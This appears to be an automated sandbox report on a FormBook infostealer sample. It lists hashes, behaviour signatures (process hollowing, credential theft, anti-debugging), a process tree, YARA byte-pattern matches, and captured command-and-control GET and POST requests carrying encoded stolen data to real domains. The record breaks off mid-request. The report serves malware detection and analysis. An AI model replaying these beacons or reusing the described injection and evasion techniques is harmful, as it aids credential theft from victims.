Loading ...

Play interactive tourEdit tour

Analysis Report Scn14.092020.scr

Overview

General Information

Sample Name:Scn14.092020.scr (renamed file extension from scr to exe)
Analysis ID:285096
MD5:f3dcebdfd88e627e79f078f41a676b76
SHA1:7837347cbb14d59cc979731c88011df78dd62ae4
SHA256:6af2c88ffcb5d4290c1bef29781f58505d75654ea54d42ee04d59b93e723c799

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scn14.092020.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3DCEBDFD88E627E79F078F41A676B76)
    • Scn14.092020.exe (PID: 6584 cmdline: C:\Users\user\Desktop\Scn14.092020.exe MD5: F3DCEBDFD88E627E79F078F41A676B76)
      • explorer.exe (PID: 3368 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6840 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 7024 cmdline: /c del 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
    • 0x160ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16008:$sqlite3text: 68 38 2A 90 C5
    • 0x1612d:$sqlite3text: 68 38 2A 90 C5
    • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Scn14.092020.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Scn14.092020.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Scn14.092020.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x153d9:$sqlite3step: 68 34 1C 7B E1
        • 0x154ec:$sqlite3step: 68 34 1C 7B E1
        • 0x15408:$sqlite3text: 68 38 2A 90 C5
        • 0x1552d:$sqlite3text: 68 38 2A 90 C5
        • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15543:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Scn14.092020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Scn14.092020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Scn14.092020.exeVirustotal: Detection: 20%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.Scn14.092020.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A4F460 FindFirstFileW,FindNextFileW,FindClose,5_2_00A4F460
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A4F459 FindFirstFileW,FindNextFileW,FindClose,5_2_00A4F459
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A4F585 FindFirstFileW,FindNextFileW,FindClose,5_2_00A4F585
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 4x nop then pop edi1_2_00415001
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 4x nop then pop edi1_2_0040C119
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi5_2_00A55001
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi5_2_00A4C119

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49771
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNeqrRFHbPNe/5B8Pw== HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bD544eiDWVMpw/c/g==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA93xRa5BlVihhxKWfRA== HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTltPR5tJ2I5Jl1jMjmA==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.jblmhomestore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqDPzebR02j5AZFkbQ== HTTP/1.1Host: www.chehol.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHslzxo1OscfD9AW+8w==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.martjeje2.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=mgpYILHtvr0Mwg0MZYgF77N/xUypMH4IxLzlgyPIKQxLVyQFR0wmQaHW4IQmamE6UWjr48at2Q== HTTP/1.1Host: www.kq-iot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=Q8+WM2Bomf5ni0SwuCpoBHUW8n6b7DImGNKI7675UaWCEqnlNuWrArVDxgeCSXP0JeKD6A53Gw==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.ekcraftmasters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1Host: www.hqxmf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1Host: www.hqxmf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=3AET6+Fblh40BCXQRB4KEY1DB+MApctu3/uB71K+4nCKf3Spdfy3uFQQowE4NnJx4EY2v4wM1g==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.panoramazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFRzM0ZtWPZ4zyVFx2w== HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
          Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 75 28 39 36 42 39 70 62 76 48 47 49 4c 4c 4f 70 2d 73 54 6e 64 76 2d 68 4a 4f 53 76 73 75 6d 36 46 68 67 62 43 4b 44 58 45 7a 47 78 72 71 31 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 2d 35 46 79 65 74 47 7a 4c 30 6f 6a 4f 64 36 70 45 30 61 6d 57 55 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tpu(96B9pbvHGILLOp-sTndv-hJOSvsum6FhgbCKDXEzGxrq1~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOR-5FyetGzL0ojOd6pE0amWU.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 75 28 39 36 42 39 70 62 76 48 47 49 4c 4c 4f 70 2d 73 54 6e 64 76 2d 68 4a 4f 53 76 73 75 6d 36 46 68 67 62 43 4b 44 58 45 7a 47 78 72 71 31 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 2d 35 46 79 65 74 47 7a 4c 30 6f 6a 4f 64 36 70 45 30 61 6d 57 55 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tpu(96B9pbvHGILLOp-sTndv-hJOSvsum6FhgbCKDXEzGxrq1~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOR-5FyetGzL0ojOd6pE0amWU.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.nittayabeauty.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.nittayabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nittayabeauty.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 72 77 74 70 4a 5a 31 6c 70 58 58 6a 44 67 56 49 33 4f 34 61 77 72 37 6c 49 5f 51 57 79 61 33 31 6f 50 33 48 50 65 65 69 47 75 6e 75 62 41 79 68 48 33 4e 6a 70 66 6d 43 67 56 4e 31 56 61 35 7a 64 51 4a 67 28 4b 65 32 64 34 4a 72 61 75 77 61 57 36 62 47 45 68 7a 4e 31 37 64 76 5a 36 33 6c 7a 4c 35 6c 55 72 43 4c 56 4a 32 59 28 67 51 48 78 6f 34 70 4e 52 30 57 37 63 44 7a 47 75 45 61 61 39 47 31 4e 2d 45 36 75 5f 6a 45 6b 32 6f 38 36 73 61 7a 39 66 43 35 58 36 51 5a 4e 36 4e 30 6a 34 71 4d 45 50 41 44 58 36 4b 77 58 33 55 67 32 30 6d 35 56 56 70 65 64 51 6b 36 48 64 6a 70 4b 6e 4d 4e 38 41 58 75 66 39 47 6f 61 4c 67 68 57 65 50 48 78 41 55 77 7a 78 42 63 6b 4c 45 37 30 56 76 47 41 77 28 50 38 49 67 2d 70 4b 70 7a 47 4c 4d 33 53 48 61 49 31 55 71 41 6f 32 36 6c 44 53 6f 52 36 6d 36 57 69 59 6a 70 70 73 73 42 28 43 48 6d 4d 65 38 6b 5a 7a 65 48 68 4e 56 6b 54 78 57 56 4e 50 33 6a 7e 70 62 4d 31 52 30 5f 41 41 4e 6a 28 43 32 6e 78 37 34 6f 76 62 50 5f 51 31 41 4f 4f 77 57 46 4f 33 4c 51 6f 31 35 46 54 37 77 58 32 50 51 79 67 2d 4e 50 64 73 7e 4b 39 53 65 69 77 48 54 2d 28 51 4d 34 51 6b 75 6a 34 6e 6e 4a 53 77 4f 66 4d 61 6b 30 33 44 76 6b 37 66 37 45 53 32 6e 61 4b 66 6f 50 7a 6f 46 69 31 68 37 31 6c 66 49 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=rwtpJZ1lpXXjDgVI3O4awr7lI_QWya31oP3HPeeiGunubAyhH3NjpfmCgVN1Va5zdQJg(Ke2d4JrauwaW6bGEhzN17dvZ63lzL5lUrCLVJ2Y(gQHxo4pNR0W7cDzGuEaa9G1N-E6u_jEk2o86saz9fC5X6QZN6N0j4qMEPADX6KwX3Ug20m5VVpedQk6HdjpKnMN8AXuf9GoaLghWePHxAUwzxBckLE70VvGAw(P8Ig-pKpzGLM3SHaI1UqAo26lDSoR6m6WiYjppssB(CHmMe8kZzeHhNVkTxWVNP3j~pbM1R0_AANj(C2nx74ovbP_Q1AOOwWFO3LQo15FT7wX2PQyg-NPds~K9SeiwHT-(QM4Qkuj4nnJSwOfMak03Dvk7f7ES2naKfoPzoFi1h71lfI.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.jblmhomestore.netConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.jblmhomestore.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jblmhomestore.net/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 61 47 72 47 36 65 50 42 55 7a 72 52 30 63 7a 62 34 56 70 4d 72 64 6c 31 57 54 50 6d 75 34 76 53 4a 30 6a 49 50 2d 44 7a 48 79 6f 64 63 37 68 78 4b 43 4a 59 70 53 49 44 7e 4d 6a 36 6e 73 42 4f 44 4a 39 44 76 77 6b 47 6e 55 4c 59 30 4e 66 55 37 43 47 44 51 50 32 6a 55 41 71 6b 7e 6f 79 68 77 41 49 68 63 69 54 5a 61 57 6b 37 32 6d 53 74 6b 38 49 58 63 49 70 47 50 62 28 48 28 62 7e 37 56 6a 41 57 34 62 73 4d 48 45 44 50 71 50 55 6e 63 54 65 46 4f 7a 6d 2d 48 62 70 47 7e 37 67 34 70 33 7e 61 28 70 6a 61 6e 77 70 52 73 4a 78 75 77 62 38 53 6a 4f 4a 2d 37 76 6b 63 65 31 67 6a 28 67 67 2d 79 34 32 4d 4b 7a 49 69 57 57 6d 46 6c 53 51 43 63 4c 66 43 32 51 4b 6e 75 74 30 32 72 43 6a 42 76 33 74 67 55 64 74 54 7e 31 7e 65 70 6f 49 64 53 69 62 46 6f 5f 35 43 39 6d 65 46 55 6e 73 6e 50 4b 70 4a 31 7a 68 5a 32 71 71 77 49 48 69 67 28 6f 32 4c 77 41 31 68 31 41 63 75 54 65 46 4d 38 5f 31 73 7e 2d 6c 62 33 5a 65 42 4e 59 4b 69 58 6c 52 33 37 76 47 45 63 58 67 51 32 56 5a 33 55 44 6d 59 39 56 6c 59 7e 50 76 76 42 76 59 67 38 4c 6a 34 6c 30 56 41 6e 39 45 38 77 34 51 71 4c 34 62 55 56 45 6b 6a 53 5f 44 61 47 5a 4a 51 51 6a 57 59 4a 77 62 66 51 70 71 52 33 38 56 7a 71 6c 59 4c 70 62 53 59 4b 63 6e 6e 6c 69 35 5f 7a 46 67 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=aGrG6ePBUzrR0czb4VpMrdl1WTPmu4vSJ0jIP-DzHyodc7hxKCJYpSID~Mj6nsBODJ9DvwkGnULY0NfU7CGDQP2jUAqk~oyhwAIhciTZaWk72mStk8IXcIpGPb(H(b~7VjAW4bsMHEDPqPUncTeFOzm-HbpG~7g4p3~a(pjanwpRsJxuwb8SjOJ-7vkce1gj(gg-y42MKzIiWWmFlSQCcLfC2QKnut02rCjBv3tgUdtT~1~epoIdSibFo_5C9meFUnsnPKpJ1zhZ2qqwIHig(o2LwA1h1AcuTeFM8_1s~-lb3ZeBNYKiXlR37vGEcXgQ2VZ3UDmY9VlY~PvvBvYg8Lj4l0VAn9E8w4QqL4bUVEkjS_DaGZJQQjWYJwbfQpqR38VzqlYLpbSYKcnnli5_zFg.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.chehol.directoryConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.chehol.directoryUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.chehol.directory/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 67 67 31 6f 6b 32 43 76 35 31 54 67 59 49 6b 5a 57 64 70 67 32 31 65 4f 6c 72 6e 46 4a 78 63 59 6d 4e 63 71 6f 6f 6c 47 72 6c 67 6a 46 72 33 6f 49 42 6c 31 72 6e 7a 41 39 36 72 4c 28 5f 28 37 32 32 50 67 50 5a 68 79 62 4d 39 66 35 4a 39 70 76 79 7e 62 35 73 6d 76 47 4f 46 36 6d 43 69 6f 61 4f 74 2d 39 6f 76 4d 4e 4c 47 4e 35 73 44 31 47 2d 74 58 52 4c 72 32 7a 2d 76 52 62 57 71 66 55 76 56 54 59 68 51 61 57 69 70 62 4b 52 6a 78 6a 6c 66 53 34 76 66 6e 51 30 52 55 38 34 31 64 63 30 52 70 73 59 48 56 45 65 54 4c 6a 33 63 57 